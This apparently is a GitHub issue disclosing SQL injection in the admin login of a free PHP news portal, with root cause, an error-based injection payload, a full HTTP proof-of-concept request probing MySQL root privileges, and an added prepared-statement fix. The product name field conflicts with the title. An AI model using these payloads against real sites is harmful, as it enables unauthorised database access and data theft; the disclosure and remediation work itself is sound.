SourceCodester Best online news portal project in php free download /admin/index.php SQL injection #45

Open
1097hzy opened this issue Jun 13, 2024 · 0 comments

Comments

@1097hzy

1097hzy commented Jun 13, 2024

SourceCodester Best online news portal project in php free download /admin/index.php SQL injection

NAME OF AFFECTED PRODUCT(S)

  • CASAP Automated Enrollment System using PHP/MySQLi with Source Code

Vendor Homepage

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • xuanluansec

Vulnerable File

  • /admin/index.php

VERSION(S)

  • V1.0

Software Link

PROBLEM TYPE

Vulnerability Type

  • SQL injection

Root Cause

  • The PHP method on line 10 of the /admin/index.php file retrieves user input from the POST element. The value of this element is then passed to the code without proper sanitization or validation, and ultimately to the database query in the PHP method on line 14. This may lead to SQL injection attacks.

Impact

  • Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained.

DESCRIPTION

  • xuanluansec has discovered a serious issue in "Best online news portal project in php free download" that can allow attackers to obtain large amounts of database content through SQL injection attacks.

Vulnerability details and POC

Payload

  • admin1'||(SELECT 0x57466361 WHERE 3243=3243 AND (SELECT 3588 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(SELECT (CASE WHEN (ISNULL(TIMESTAMPADD(MINUTE,9341,NULL))) THEN 1 ELSE 0 END)),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'

Burp Suite (POC)

POST /admin/ HTTP/1.1
Host: www.101news.com:8120
Content-Length: 328
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.101news.com:8120
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.101news.com:8120/admin/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=mgnba8pjlh638vt3ipj6ue06ph
Connection: close

username=admin1'||(SELECT 0x48577666 WHERE 4844=4844 AND (SELECT 7969 FROM(SELECT COUNT(*),CONCAT(0x716a707171,(SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x726f6f74 LIMIT 0,1)=0x59) THEN 1 ELSE 0 END)),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=admin&login=
  • Here is the MySQL database name obtained from the sqlmap attack
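A hardened form of the admin login check described under Root Cause, as an added example that is not the project's code: it assumes a mysqli connection in `$conn` and an `admin` table with `username` and `password` (stored as a `password_hash()` output) columns, none of which the report shows.

```php
<?php
// Added example, not code from the reported project. Assumes a mysqli
// connection in $conn and an `admin` table with `id`, `username` and
// `password` (password_hash() output) columns; the real schema is not shown.

// The pattern the report describes: the POST value is concatenated into the
// query text, so a quote character in the input is parsed as SQL, e.g.
//   $q = "SELECT * FROM admin WHERE username='" . $_POST['username'] . "'";

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // driver errors become exceptions

function admin_login(mysqli $conn, string $username, string $password): ?array
{
    // A bound parameter is sent as data; the server never parses it as SQL,
    // so quotes, || and subqueries in the input cannot change the statement.
    $stmt = $conn->prepare(
        'SELECT id, username, password FROM admin WHERE username = ? LIMIT 1'
    );
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // Verify the password against a stored hash in PHP rather than matching
    // a plaintext password inside the SQL WHERE clause.
    if ($row === null || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

if (isset($_POST['login'])) {
    $username = (string)($_POST['username'] ?? '');
    $user = admin_login($conn, $username, (string)($_POST['password'] ?? ''));
    if ($user === null) {
        // Log failures without echoing raw input back into the page.
        error_log('admin login failed for user ' . substr($username, 0, 64));
        http_response_code(401);
        exit('Invalid username or password.');
    }
    session_regenerate_id(true);       // new session id after a successful login
    $_SESSION['admin_id'] = $user['id'];
}
```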